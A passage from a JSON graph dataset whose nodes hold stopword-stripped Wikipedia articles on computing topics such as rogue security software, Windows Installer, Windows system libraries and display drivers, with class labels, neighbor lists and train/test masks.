carry mainly old well-established kinds crimes contrast several private initiatives providing discussion forums lists dangerous products founded soon appearance first rogue security software reputable vendors kaspersky also began provide lists rogue security software 2005 anti-spyware coalition founded coalition anti-spyware software companies academics consumer groups many private initiatives first less informal discussions general internet forums started even entirely carried individual people perhaps famous extensive one spyware warrior list rogue/suspect antispyware products websites eric howes however updated since may 2007 website recommends checking following websites new rogue anti-spyware programs however really new simply re-branded clones knockoffs rogue applications around years december 2008 us district court maryland—at request ftc—issued restraining order innovative marketing inc kiev-based firm producing marketing rogue security software products winfixer winantivirus drivecleaner errorsafe xp antivirus company us-based web host bytehosting internet hosting services llc assets frozen barred using domain names associated products advertisement false representation law enforcement also exerted pressure banks shut merchant gateways involved processing rogue security software purchases cases high volume credit card chargebacks generated purchases also prompted processors take action rogue security software vendors",
    "neighbors": [
      3072,
      5636,
      10245,
      10756,
      9227,
      9233,
      9242,
      9761,
      9256,
      9771,
      46,
      10297,
      3643,
      7739,
      9791,
      1088,
      9287,
      107,
      10872,
      5245,
      6786,
      5764,
      7304,
      9356,
      10898,
      4245,
      10392,
      1690,
      3739,
      5281,
      2213,
      681,
      8387,
      4314,
      224,
      4344,
      3320,
      4863,
      1279,
      3333,
      7441,
      8978,
      4883,
      278,
      4374,
      3867,
      8998,
      300,
      5935,
      7983,
      1337,
      10556,
      9537,
      3395,
      7515,
      9569,
      3941,
      11621,
      877,
      9591,
      5500,
      8064,
      2945,
      7044,
      1417,
      9102,
      10141,
      939,
      1970,
      950,
      4023,
      7098,
      6588,
      8639,
      8640,
      2508,
      3032,
      3555,
      9187,
      6643,
      2041
    ],
    "mask": "None"
  },
  {
    "node_id": 4166,
    "label": 8,
    "text": "NetDynamics_Application_Server:netdynamics application server netdynamics application server early java-based integrated software platform product developed netdynamics silicon valley start-up company founded 1995 zack rinat ofer ben-shachar unlike early application server competitors netdynamics chose java development language platform java became dominant development language web-based applications netdynamics experienced significant revenue growth 1997 1998 however product soon encountered problems due relative immaturity java rush release new product versions rapidly changing marketplace believing new jdbc api immature netdynamics created proprietary database development api based product rogue wave software netdynamics inc. acquired sun microsystems july 1998 application server software together netscape application server basis sun iplanet application server offering netdynamics initially competed bluestone application server based c programming language kiva application server mid-1998 new competitor weblogic inc. released java application server compliant jdbc another emerging standard javabeans weblogic application server eventually marketplace explosive growth application server business caught attention larger information technology companies 1998 early application server start-up companies acquired hewlett-packard purchased bluestone sun microsystems acquired netdynamics netscape communications corporation bought kiva weblogic acquired bea systems weblogic continues survive product oracle corporation acquired bea 2008 product renamed oracle weblogic",
    "neighbors": [
      9665,
      5384,
      5612,
      5677,
      7983,
      4189,
      4222
    ],
    "mask": "Test"
  },
  {
    "node_id": 4167,
    "label": 8,
    "text": "Conversion_funnel:conversion funnel conversion funnel phrase used e-commerce describe journey consumer takes internet advertising search system navigating e-commerce website finally converting sale metaphor funnel used describe way users guided goal fewer navigation options step using metaphor advertising efforts aimed upper funnel middle funnel lower funnel potential customers typically large number customers search product/service register page view referring page linked e-commerce site banner ad ad network conventional link small proportion seeing advertisement link actually click link metric used describe ratio click-through rate ctr represents top level funnel typical banner advertising click-through rates 0.02 late 2010 decreased past three years click-through rates highly sensitive small changes link text link size link position many others effects interact cumulatively process understanding creative material brings highest click-through rate known ad optimization link clicked visitor referring page enters e-commerce site small proportion visitors typically proceed product pages creating constriction metaphorical funnel step visitor takes reduces number visitors typically 30 –80 per page adding product shopping cart registering filling contact details payment reduce numbers step-by-step cumulatively along funnel steps fewer visitors get becoming paying customers reason sites similar pricing products hugely different conversion rates visitors customers therefore greatly differing profits",
    "neighbors": [
      8914,
      11578,
      3782,
      5150
    ],
    "mask": "Test"
  },
  {
    "node_id": 4168,
    "label": 4,
    "text": "Cyber_Threat_Intelligence_Integration_Center:cyber threat intelligence integration center cyber threat intelligence integration center ctiic new united states federal government agency fusion center existing agencies private sector real-time use cyber attacks ctiic created due blocked efforts congress stymied liability privacy concerns citizens ctiic formally announced lisa monaco february 10 2015 wilson center agency within office director national intelligence tonya ugoretz br january 7 2016 march 13 2019 erin joe march 13 2019 present",
    "neighbors": [
      3759,
      7887,
      3495
    ],
    "mask": "Test"
  },
  {
    "node_id": 4169,
    "label": 1,
    "text": "Postcode_Plants_Database:postcode plants database postcode plants database uk resource identifying locally native plants species based postcode hosted natural history museum london used determine plant conservation schemes also information relationships plants associated animals",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 4170,
    "label": 6,
    "text": "Archive_bit:archive bit archive bit file attribute used cp/m microsoft operating systems os/2 amigaos used indicate whether file backed archived windows os/2 file created modified archive bit set i.e turned file backed archive bit cleared i.e turned thus meaning archive bit file archived cp/m meaning inverted creating modifying file clears archive bit bit set file backed incremental backup task may use archive bit distinguish files already backed select new modified files backup backup software may provide option full backup clearing archive bits – back files regardless archive bit status clear archive bit files processed backup allows creation initial full backup supplemented incremental backups future operating system never clears archive bit unless explicitly told user even user explicitly tells operating system copy file purpose archiving archive bit still cleared specific command clearing setting bit must executed ms-dos well nearly versions windows archive bit status viewed changed attrib command-line utility viewing properties file windows shell windows explorer archive bit status also viewed changed getfileattributes getfileattributesex setfileattributes windows apis archive bit set cleared attributes property vbscript jscript file clear archive bit moved one place file system another archive bit reverts set typically computer system never backed manner clears archive bits files computer archive bits set applications make use archive bits without user request archive bit file attribute part file contents file remain unchanged status archive bit changes relying archive bit backing files unreliable multiple backup programs setting clearing archive bit volume another possibility use timestamp last change file directory typically technique used unix-like operating systems",
    "neighbors": [
      9025,
      9762,
      11683,
      5158,
      3366,
      5225,
      6797,
      8301,
      9166,
      9840,
      4051,
      5492,
      10711,
      4409,
      603
    ],
    "mask": "Test"
  },
  {
    "node_id": 4171,
    "label": 7,
    "text": "Aptana:aptana aptana inc. company makes web application development tools use variety programming languages javascript ruby php python aptana main products include aptana studio aptana cloud aptana jaxer aptana studio open-source integrated development environment ide building web applications based eclipse supports javascript html dom css code-completion outlining javascript debugging error warning notifications integrated documentation additional plugins allow aptana studio support ruby rails php python perl adobe air apple iphone nokia wrt web runtime aptana studio available standalone windows mac os x linux plugin eclipse aptana studio 3 provides following support php application development 2.0 version aptana provide php plugin transferred development efforts pdt project aptana version 1.5 provided support developing php applications via add-on php plugin included aptana studio supports ruby rails development using radrails open source plugin ruby rails framework includes aptana studio provides support python form pydev plugin provides following advantages aptana announced previously commercial pydev extensions open sourced aptana ide provides considerable support adobe air nokia web runtime provides support developing rich mobile apps nokia s60 series phones includes 30 models tens millions units use around world nokia wrt plug-in aptana studio provides features enable creation editing testing deployment wrt widgets within aptana studio wrt widgets small task-focused web applications installed run way s60 applications wrt widgets allow websites web services optimised use s60 devices easy develop use wrt widgets ideal driving traffic website s60 devices aptana studio comes following javascript libraries added updated desired code assist similar completing code statements presenting pop-up either applies built-in functions/methods already coded — latter use requires documenting functions/methods scriptdoc documentation dialect similar used javadoc code assist feature includes information browser support javascript methods/properties html elements css properties support uploading downloading synchronization using ftp sftp pro community editions support integrated javascript debugging firefox internet explorer supported pro edition aptana studio available open source community edition previously available features paid-for pro edition merged community edition features pro part standard community edition studio thus aptana ceased exist multiple edition ide aptana uses dual licensing model model users may choose use aptana ide free software/open source gnu general public license commonly known gpl aptana public license known apl gpl license aptana ide available free charge long redistribution aptana ide adheres terms gpl license users may download software free modify integrate distribute aptana also offers simplified apl license organizations n't need redistribute aptana studio derivatives outside company aptana currently led paul colton founder ceo uri sarid cto/vp engineering kevin hakman director evangelism staff headcount surpassed 25 september 1 2008 aptana active participant openajax alliance hakman serving director ide working group aptana acquired appcelerator inc. january 7 2011 employees aptana absorbed mountain view campus appcelerator work scheduled continue release aptana 3.0 appcelerator webcast made users aware intention integrate mobile application framework aptana studio planned beta within q1 2011 emphasis visual workflow indicated products continued support continue existing aptana products appcelerator put jaxer github aptana jaxer made obsolete node.js open-source ajax web server building rich web pages applications using unified ajax model wherein client-side server-side code written javascript jaxer server-side engine based mozilla gecko browser engine used firefox mozilla engine allows jaxer provide server-side dom page may manipulated server-side processing using techniques familiar client-side programmers jaxer server-side javascript apis enable database access file system access network communications user sessions functions typical web application servers jaxer also provides access java objects via open source dwr project jaxer github aptana jaxer provides page-processing environment based mozilla engine provides gecko-based dom spidermonkey javascript engine allow pages rendered manipulated server sent browser jaxer also provides ajax model performing asynchronous requests server client server apis allow requests made simply calling server-side javascript functions client behind scenes jaxer provides logic required manage request retrieve response server useful web scraping jaxer standalone web server works another server apache jetty tomcat jaxer provides server-side dom api processing pages served web server delivering results browser jaxer may integrated aptana studio via optional plugin open source gpl available windows mac os x linux/solaris november 2009 aptana significantly scaled back development support jaxer aptana representative noted n't sufficient adoption make money earning proposition aptana cloud connect aptana web hosting application management service cloud connect provides infrastructure required host applications developed using technologies supported aptana studio primarily based apache support general web/ajax php ruby rails jaxer cloud connect also supports java-based web applications may deployed managed using cloud service applications hosted cloud connect may developed offline deployed managed directly using cloud management features included aptana studio cloud connect service also provides team management hosted source control using subversion remote editing/preview application synchronization local staging production environments",
    "neighbors": [
      1034,
      6154,
      9245,
      5677,
      84,
      6231,
      603,
      11357,
      2658,
      7785,
      3583,
      7293,
      1668,
      6791,
      6797,
      8854,
      1687,
      10910,
      3761,
      7346,
      11446,
      7355,
      190,
      5311,
      7871,
      6338,
      7364,
      4822,
      8923,
      225,
      7396,
      10478,
      10991,
      11503,
      4853,
      6910,
      259,
      1802,
      10507,
      4378,
      7455,
      9509,
      2348,
      303,
      7983,
      11060,
      823,
      4919,
      2372,
      11259,
      1353,
      11087,
      339,
      1363,
      6998,
      9560,
      10587,
      865,
      8554,
      5483,
      10097,
      1409,
      3462,
      8588,
      9614,
      8605,
      2465,
      438,
      10683,
      9152,
      8644,
      11208,
      11221,
      5078,
      4056,
      3545,
      3553,
      482,
      487,
      7658,
      7147,
      5612,
      9195,
      9211,
      2045,
      6143
    ],
    "mask": "None"
  },
  {
    "node_id": 4172,
    "label": 3,
    "text": "HyperSPARC:hypersparc hypersparc code-named pinnacle microprocessor implements sparc version 8 instruction set architecture isa developed ross technology cypress semiconductor hypersparc introduced 1993 competed sun microsystems supersparc raju vegesna microarchitect hypersparc sun microsystem primary competitor mid-1990s fujitsu acquired ross cypress hypersparc considered important new owner sparc64 developed hal computer systems also fujitsu subsidiary view shared analysts hypersparc two-way superscalar microprocessor four execution units integer unit floating-point unit load/store unit branch unit hypersparc on-die 8 kb instruction cache two instructions fetched per cycle decoded decoder could decode new instructions previously decoded instructions issued execution units integer register file contained 136 registers providing eight register windows feature defined sparc isa two read ports integer unit four-stage pipeline two stages added pipeline would equal non-floating-point pipelines integer multiply divide instructions added v8 version sparc architecture 18- 37-cycle latency respectively stalled pipeline completed microprocessor supported multiprocessing mbus systems hypersparc consists 1.2 million transistors fabricated cypress 0.65 µm two-layer metal complementary metal–oxide–semiconductor cmos process later iterations hypersparc transistors due new features ported newer processes fabricated fujitsu except last iteration fabricated nec hypersparc multi-chip design packaged ceramic multi-chip module mcm pin grid array pga hypersparc used cypress sparcset chipset introduced late july 1992 developed santa clara california start-up nimbus technologies inc. cypress fabricated design sparcset also compatible sparc microprocessors",
    "neighbors": [
      9665,
      11426,
      8355,
      9955,
      3175,
      5358,
      1776,
      9137,
      7770,
      630,
      1399,
      10837,
      11129,
      1818,
      6815
    ],
    "mask": "Test"
  },
  {
    "node_id": 4173,
    "label": 2,
    "text": "Microsoft_Windows_library_files:microsoft windows library files microsoft windows operating system supports form shared libraries known dynamic-link libraries code libraries used multiple processes one copy loaded memory article provides overview core libraries included every modern windows installation top windows applications built hal.dll kernel-mode library file used user-mode program ntdll.dll used programs dependency win32 libraries used programs windows hardware abstraction layer hal implemented hal.dll hal implements number functions implemented different ways different hardware platforms context refers mostly chipset components operating system call functions way platforms without regard actual implementation example responding interrupt quite different machine advanced programmable interrupt controller apic one without hal provides single function purpose works kinds interrupts various chipsets components need concerned differences hal loaded kernel address space runs kernel mode routines hal called directly applications user mode apis correspond directly hal routines instead hal provides services primarily windows executive kernel kernel mode device drivers although drivers hardware contained files commonly file type .sys core drivers compiled hal.dll kernel mode device drivers devices buses pci pci express directly call routines hal access i/o ports registers devices drivers use hal routines different platforms may require different implementations operations hal implements operations appropriately platform driver executable file used platforms using cpu architecture driver source file portable across architectures x86 systems several different hal files installation media windows installation procedure determines ones appropriate current platform copies hard drive renaming hal.dll necessary among criteria selection presence acpi-compatible bios presence apic whether multiple processors present enabled multiple cores multi-core cpu even logical processors implemented hyperthreading cpu count processors purpose x86-64 itanium platforms one possible hal.dll cpu architecture ntdll.dll exports windows native api native api interface used user-mode components operating system must run without support win32 api subsystems api implemented ntdll.dll upper edge ntoskrnl.exe variants majority exported symbols within libraries prefixed nt example ntdisplaystring native apis also used implement many kernel apis base apis exported kernel32.dll large majority windows applications call ntdll.dll directly applications linked directly library said use native subsystem primary reason existence perform tasks must run early system startup sequence win32 subsystem available obvious important example creation win32 subsystem process csrss.exe csrss.exe process exists win32 processes may created therefore process creates smss.exe session manager must use native subsystem csrss.exe application despite .exe file extension native applications executed user program win32 subsystems example autochk.exe binary runs chkdsk system initialization blue screen prominent examples services implement various subsystems csrss.exe unlike win32 applications native applications instantiate within kernel runtime code ntoskrnl.exe must different entry point ntprocessstartup rather w win maincrtstartup found win32 application obtain command-line arguments via pointer in-memory structure manage memory using rtl heap api win32 heap apis wrappers around—no real difference return execution call ntterminateprocess opposed exitprocess common library linked native applications nt.lib contains startup code native applications similar c runtime provides startup code win32 apps though api undocumented native applications built using windows driver development kit many antivirus software utility software vendors incorporate native applications within products usually perform boot-time task carried userspace libraries section implement various subsets win32 api kernel32.dll exposes applications win32 base apis memory management input/output i/o operations process thread creation synchronization functions many implemented within kernel32.dll calling corresponding functions native api exposed ntdll.dll gdi32.dll exports graphics device interface gdi functions perform primitive drawing functions output video displays printers used example xp version paint applications call gdi functions directly perform low-level drawing line rectangle ellipse text output font management similar functions initially gdi supported 16 256 color ega/vga display cards monochrome printers functionality expanded years includes support things like truetype fonts alpha channels multiple monitors user32.dll implements windows user component creates manipulates standard elements windows user interface desktop windows menus thus enables programs implement graphical user interface gui matches windows look feel programs call functions windows user perform operations creating managing windows receiving window messages mostly user input mouse keyboard events also notifications operating system displaying text window displaying message boxes many functions user32.dll call upon gdi functions exported gdi32.dll actual rendering various elements user interface types programs also call gdi functions directly perform lower-level drawing operations within window previously created via user32 functions comctl32.dll implements wide variety standard windows controls file open save save dialogs progress bars list views calls functions user32.dll gdi32.dll create manage windows ui elements place various graphic elements within collect user input comdlg32.dll common dialog box library implements wide variety windows dialog boxes intended perform microsoft deems 'common application tasks starting release windows vista microsoft considers open save dialog boxes provided library deprecated replaced 'common item dialog api ws2_32.dll implements winsock api provides tcp/ip networking functions provides partial broken compatibility network apis wsock.dll wsock32.dll older versions win3.11 win95 compatibility advapi32.dll provides security calls functions manipulating windows registry netapi32.dll provides functions querying managing network interfaces ole32.dll provides component object model well object linking embedding shscrap.dll part object linking embedding ole mechanism implements support shell scrap files automatically created drag selected content ole-capable application explorer window desktop also use object packager create dragged another ole-capable application functionality removed windows vista therefore later versions improve security rid operating system generally unused functionality scrap .shs files used viruses contain wide variety files including executable code file extension shown even hide file extensions known file types disabled functionality restored copying registry entries dll windows xp system winmm.dll provides access original winmm audio api imm32 responsible invoking interacting input method editor msvcrt.dll c standard library visual c++ msvc compiler version 4.2 6.0 provides programs compiled versions msvc standard c library functions include string manipulation memory allocation c-style input/output calls others msvcp*.dll corresponding c++ library shipped windows versions since windows 95 osr2 use windows components earlier versions shipped crtdll.dll library instead older versions windows programs linked msvcrt.dll expected install compatible copy system32 folder contributed dll hell many installers failed check library version installed version replacing versions msvc 4.0 7.0 13.0 used differently named dlls version msvcr20.dll msvcr70.dll msvcr71.dll msvcp110.dll etc. applications required install appropriate version microsoft offers visual c++ redistributable packages purpose though windows typically comes one version already installed version 14.0 c/c++ runtime moved new dll ucrtbase.dll however c/c++ programs using ucrtbase.dll forced link another new dll vcruntime whose name continues change version msvc e.g vcruntime140.dll source code runtime libraries included visual c++ reference debugging e.g codice_1 runtime library used programs written visual c++ compilers e.g mingw compilers runtime libraries programs written c visual basic.net c++/cli .net languages require .net framework many libraries one mscorlib.dll multilanguage standard common object runtime library formerly microsoft common object runtime library so-called assemblies e.g system.windows.forms.dll",
    "neighbors": [
      11270,
      6664,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      2605,
      5165,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      1632,
      3170,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      5754,
      4731,
      7290,
      10879,
      8841,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      2213,
      6820,
      1703,
      2221,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      9943,
      2782,
      3294,
      9442,
      4836,
      4326,
      2279,
      10470,
      1770,
      3308,
      5356,
      1776,
      10993,
      3834,
      1791,
      8959,
      11519,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      10016,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      7983,
      9008,
      1844,
      9525,
      11572,
      7479,
      10039,
      6972,
      3394,
      4423,
      847,
      3922,
      4439,
      5465,
      8545,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      1418,
      5003,
      5004,
      8080,
      5523,
      11677,
      10654,
      10143,
      929,
      11683,
      430,
      6062,
      8625,
      10673,
      10675,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      2525,
      478,
      6114,
      6115,
      6637,
      9709,
      6640,
      6641,
      499,
      3573,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 4174,
    "label": 2,
    "text": "Windows_Installer:windows installer windows installer previously known microsoft installer codename darwin software component application programming interface api microsoft windows used installation maintenance removal software installation information optionally files packaged installation packages loosely relational databases structured com structured storages commonly known msi files default filename extensions windows installer contains significant changes predecessor setup api new features include gui framework automatic generation uninstallation sequence windows installer positioned alternative stand-alone executable installer frameworks older versions installshield nsis introduction windows store microsoft encouraged third parties use windows installer basis installation frameworks synchronize correctly installers keep internal database installed products consistent important features rollback versioning depend consistent internal database reliable operation furthermore windows installer facilitates principle least privilege performing software installations proxy unprivileged users package describes installation one full products universally identified guid product made components grouped features windows installer handle dependencies products single installed working program set programs product product identified unique guid productcode property providing authoritative identity throughout world guid combination version number productversion property allows release management product files registry keys package includes package logic metadata relates package executes running example changing exe file product may require productcode productversion changed release management however merely changing adding launch condition product remaining exactly previous version would still require packagecode change release management msi file feature hierarchical group components feature may contain number components sub-features smaller packages consist single feature complex installers may display custom setup dialog box user select features install remove package author defines product features word processor example might place program core file one feature program help files optional spelling checker stationery modules additional features component basic unit product component treated windows installer unit installer install part component components contain program files folders com components registry keys shortcuts user directly interact components components identified globally guids thus component shared among several features package multiple packages ideally use merge modules key path specific file registry key odbc data source package author specifies critical given component file common type key path term key file commonly used component contain one key path component explicit key path component destination folder taken key path msi-based program launched windows installer checks existence key paths mismatch current system state value specified msi package e.g. key file missing related feature re-installed process known self-healing self-repair two components use key path user interface phase typically queries target system displays installation wizard enables user change various options affect installation however user interface sequence make changes system following reasons user clicks install button typical msi installation wizard installation proceeds execute phase software components actually installed execute phase makes system changes display user interface elements execute phase happens two steps installation operations transactional words operation windows installer performs generates equivalent undo operation would revert change made system case script action fails deferred execution operation cancelled user actions performed point rolled back restoring system original state standard windows installer actions automatically write information rollback script package authors create custom actions change target system also create corresponding rollback actions well uninstall actions uninstallation-rollback actions design feature applied correctly mechanism also roll back failed uninstall application good working state windows installer advertise product rather actually install product appear installed user actually installed run first time triggering entry point means start menu shortcut opening document product configured handle invoking advertised com class package advertised administrator using group policy deployment mechanism running msiexec executable /jm per-machine advertisement /ju per-user advertisement switch msi packages authored installshield may prevent use native msi features user must administrator privileges complete advertised installation similar advertising installs feature soon user tries use administrative installation creates uncompressed source image product typically used installing running application network location administrative installation typical installation create shortcuts register com servers create add remove programs entry often administrative installation enables user install product way features run uncompressed installation source administrative installations also useful creating windows installer patch requires uncompressed images earlier current versions product order compute binary file differences administrative installation performed running msiexec executable /a switch developer installer package may write code serve purpose delivered dll exe vbscript javascript executed installation sequences including user clicks button user interface installexecutesequence custom actions typically validate product license keys initialize complex services developers normally provide inverse custom actions use uninstall msiexec provides way break loading specified custom action dll invoking action windows installer package may contain another package installed time ideally provided .msm file component may also separate executable program unpacked installer package installexecutesequence run immediately file optionally deleted end installexecutesequence ideal using older installers .msm file component called microsoft merge module utilized single integrate common components contains images tables relevant information regarding common components ready-made merge modules supplied visual studio downloaded alternative sources windows installer 4.0 shipped windows vista incorporates capabilities take advantage user account control feature application install without elevated privileges msi package marked thus allowing install without prompting user administrator credentials windows installer also works conjunction restart manager installing updating application system component full user interface mode user displayed list affected applications shut restarted files updated installer actions running silent mode perform application restarts automatically system services tray applications also restarted manner creating installer package new application trivial necessary specify files must installed registry keys non-standard operations done using custom actions typically developed dlls number commercial freeware products assist creating msi packages including visual studio vs 2010 installshield wix varying degrees user interface behavior may configured use less common situations unattended installation prepared installer package compiled reading instructions files developer local machine creating .msi file user interface dialog boxes presented start installation changed configured setup engineer developing new installer limited language buttons text fields labels arranged sequence dialogue boxes installer package capable running without ui called unattended installation microsoft provides set internal consistency evaluators ice used detect potential problems msi database ice rules combined cub files stripped-down msi files containing custom actions test target msi database contents validation warnings errors ice validation performed platform sdk tools orca msival2 validation tools ship various authoring environments example ice rules addressing ice validation warnings errors important step release process october 2018 microsoft released msix packaging tool successor msi",
    "neighbors": [
      10243,
      11270,
      2568,
      5643,
      4624,
      6674,
      1043,
      9234,
      537,
      8729,
      540,
      3102,
      1055,
      6686,
      9762,
      2083,
      8227,
      8740,
      1577,
      3114,
      10281,
      2095,
      4143,
      9263,
      9780,
      2101,
      6709,
      8246,
      10812,
      3648,
      10817,
      9286,
      10310,
      1098,
      3659,
      7754,
      4173,
      10317,
      10828,
      9808,
      4178,
      83,
      10835,
      9813,
      10839,
      603,
      3163,
      9819,
      8798,
      608,
      1632,
      3170,
      5225,
      10857,
      622,
      1647,
      9839,
      4210,
      7796,
      1656,
      6265,
      5754,
      4731,
      7290,
      9340,
      10879,
      5761,
      8834,
      9348,
      5765,
      10886,
      2183,
      6281,
      8841,
      651,
      5259,
      653,
      6797,
      2193,
      9874,
      10900,
      3222,
      10902,
      3224,
      4248,
      11414,
      7838,
      9377,
      3235,
      4771,
      6820,
      7846,
      1703,
      7847,
      2221,
      10414,
      3250,
      5300,
      7351,
      7356,
      2749,
      10428,
      2755,
      2244,
      8391,
      200,
      9420,
      1741,
      722,
      4309,
      214,
      1750,
      9434,
      9946,
      3804,
      2782,
      736,
      4321,
      6370,
      9442,
      4836,
      9953,
      4326,
      2279,
      3303,
      6375,
      1770,
      11498,
      3308,
      237,
      3821,
      4845,
      5356,
      8940,
      4850,
      7411,
      10991,
      10993,
      3834,
      6396,
      1791,
      8959,
      11519,
      5380,
      9988,
      6927,
      3856,
      11030,
      3351,
      5401,
      5913,
      8473,
      8985,
      8988,
      11546,
      6431,
      4384,
      9505,
      5413,
      2854,
      11559,
      808,
      3881,
      5928,
      10024,
      10026,
      10029,
      7983,
      10033,
      11570,
      1844,
      9525,
      4406,
      10039,
      11572,
      315,
      6972,
      5437,
      7486,
      5952,
      3394,
      1348,
      8517,
      11076,
      844,
      847,
      3921,
      3922,
      2389,
      1366,
      4439,
      5465,
      10079,
      11616,
      2401,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      2432,
      10623,
      3970,
      10624,
      10631,
      9609,
      1418,
      5003,
      5004,
      3471,
      8080,
      5523,
      1940,
      7064,
      4505,
      11677,
      10654,
      8607,
      929,
      4001,
      11683,
      3496,
      4010,
      10157,
      430,
      6062,
      7088,
      10673,
      950,
      9655,
      6584,
      1978,
      2493,
      960,
      8132,
      6088,
      969,
      5067,
      7629,
      3535,
      4561,
      8659,
      2005,
      1498,
      5594,
      478,
      479,
      8161,
      6114,
      6115,
      10727,
      5096,
      4074,
      2027,
      5612,
      6637,
      4590,
      9196,
      9709,
      2545,
      6641,
      11247,
      8692,
      3573,
      9205,
      10229,
      11249,
      9721,
      5119
    ],
    "mask": "None"
  },
  {
    "node_id": 4175,
    "label": 3,
    "text": "Compaq_Presario_1700:compaq presario 1700 compaq presario 1700 notebook pc first manufactured compaq 1999 notable intel processors 8 mb 8 mib mobility rage m1 graphics chip relatively large screen coupled thin light casing allowed balance power portability especially given quoted 3 hour battery life made notebook especially popular business users inclusion ati rage m1 graphics chip allowed 1700 compete closely high-end notebooks higher price ranges heightened attraction business market system could comfortably run high-demand applications relative ease lightweight portable form",
    "neighbors": [
      6765,
      799
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4176,
    "label": 7,
    "text": "Veeva_Systems:veeva systems veeva systems inc. cloud-computing company focused pharmaceutical life sciences industry applications headquartered pleasanton california founded 2007 peter gassner matt wallach works software service global life science industry company went public 2013 march 28 2018 market capitalization usd 10 billion 2015 veeva acquired zinc ahead content management software company",
    "neighbors": [
      4194,
      467
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4177,
    "label": 2,
    "text": "Luis_Villa:luis villa luis villa american attorney programmer worked deputy general counsel senior director community engagement wikimedia foundation previously attorney mozilla worked revision mozilla public license mpl continued work next job greenberg traurig part team defending google oracle claims concerning android prior graduating columbia law school 2009 employee ximian acquired novell 2003 spent year senior geek residence harvard berkman center internet society working stopbadware.org elected four times board gnome foundation editor-in-chief columbia science technology law review blogs regularly director open source initiative april 2012 march 2015",
    "neighbors": [
      1026,
      11394,
      2955,
      5644,
      6413,
      4367,
      8848,
      657,
      9872,
      1939,
      3859,
      2581,
      3478,
      10255,
      6808,
      10642,
      7450,
      1822,
      6302,
      7584,
      802,
      5410,
      6691,
      6947,
      6694,
      8354,
      8104,
      5931,
      8364,
      8621,
      9908,
      1717,
      823,
      2109,
      11069,
      10687,
      3649,
      708,
      10822,
      3015,
      8263,
      843,
      589,
      6352,
      11602,
      8787,
      4437,
      6489,
      3802,
      4831,
      9696,
      11232,
      5095,
      4459,
      7793,
      1394,
      1396,
      3189,
      11643
    ],
    "mask": "None"
  },
  {
    "node_id": 4178,
    "label": 2,
    "text": "Windows_Display_Driver_Model:windows display driver model windows display driver model wddm graphic driver architecture video card drivers running microsoft windows versions beginning windows vista replacement previous windows 2000 windows xp display driver model xddm/xpdm aimed enabling better performance graphics new graphics functionality stability display drivers windows vista windows 7 choose either adhere wddm xddm removal xddm windows 8 however wddm became option wddm provides functionality required render desktop applications using desktop window manager compositing window manager running top direct3d also supports new dxgi interfaces required basic device management creation wddm specification requires least direct3d 9-capable video card display driver must implement device driver interfaces direct3d 9ex runtime order run legacy direct3d applications may optionally implement runtime interfaces direct3d 10 higher wddm drivers enable new areas functionality uniformly provided earlier display driver models include context graphics virtualization means individual processes user mode see memory adjacent processes even means insertion forged commands command stream wddm drivers allow video memory virtualized video data paged video memory system ram case video memory available turns insufficient store video data textures currently unused data moved system ram disk swapped data needed fetched back virtualization could supported previous driver models xp driver model extent responsibility driver instead handled runtime level runtime handles scheduling concurrent graphics contexts list commands put queue execution gpu preempted runtime critical task arrives begun execution differs native threads cpu one task interrupted therefore take longer necessary make computer appear less responsive hybrid scheduling algorithm native light threads cooperation threads would achieve seamless parallelism important note scheduling new concept previously responsibility individual driver developers wddm attempts unify experience across different vendors controlling execution gpu tasks direct3d graphics surface memory area contains information textured meshes used rendering 2d 3d scene wddm allows direct3d surfaces shared across processes thus application incorporate mesh created another application scene rendering sharing textures processes wddm difficult would required copying data video memory system memory back video memory new device wddm driver hangs encounters fault graphics stack restart driver graphics hardware fault intercepted necessary driver reset drivers windows xp free deal hardware faults saw fit either reporting user attempting recover silently wddm driver hardware faults cause driver reset user notified popup unifies behavior across vendors previous drivers fully implemented kernel mode whereas wddm implemented partly user mode user mode area fails unrecoverable error cause application quit unexpectedly instead producing blue screen error would previous driver models wddm also allows graphics hardware reset users update drivers without requiring reboot new driver model requires graphics hardware shader model 2.0 support least since fixed function pipeline translated 2.0 shaders however according microsoft 2009 1–2 percent hardware running windows vista used xddm rest already wddm capable also requires hardware features consequently sm 2.0-supporting hardware intel gma 900 fails wddm certification one limitations wddm driver model version 1.0 support multiple drivers multi-adapter multi-monitor setup multi-monitor system one graphics adapter powering monitors adaptors must use wddm driver one driver used windows disable one wddm 1.1 limitation wddm 1.0/1.1 allow modes previously handled driver spanning mode stretching desktop across two monitors although dual view still available one chief scenarios windows display driver model enables desktop window manager since desktop application windows managed dwm direct3d applications number open windows directly affects amount video memory required limit number open windows video memory available may prove insufficient necessitating virtualization window contents dwm composes final desktop generated different processes cross-process surface sharing necessary also directx applications running alongside dwm dwm-managed desktop must able access gpu shared manner necessitating scheduling though true microsoft implementation composited desktop windows vista hand composited desktop need theoretically require new display driver model work expected successful implementations composited desktops done windows vista platforms quartz compiz windowfx approach microsoft attempted try make sure wddm unified experience across different gpus multiple vendors standardizing features performance software features missing driver models could made immaterial extensions less restrictive simply different driver model place windows vista introduced wddm 1.0 new display driver architecture designed better performing reliable support new technologies including hdcp hybrid sleep combines hibernation sleep mode functionality enhanced stability event power failure also requires wddm windows 7 supports major additions wddm known wddm 1.1 details new version unveiled winhec 2008 new features include hardware acceleration gdi direct2d/directwrite operations helps reduce memory footprint windows 7 dwm compositing engine longer needs keep system memory copy surfaces used gdi/gdi+ windows vista dxgi 1.1 direct3d 11 direct2d directwrite made available windows vista platform update however gdi/gdi+ vista continues rely software rendering desktop window manager continues use direct3d 9ex wddm 1.1 drivers backward compatible wddm 1.0 specification 1.0 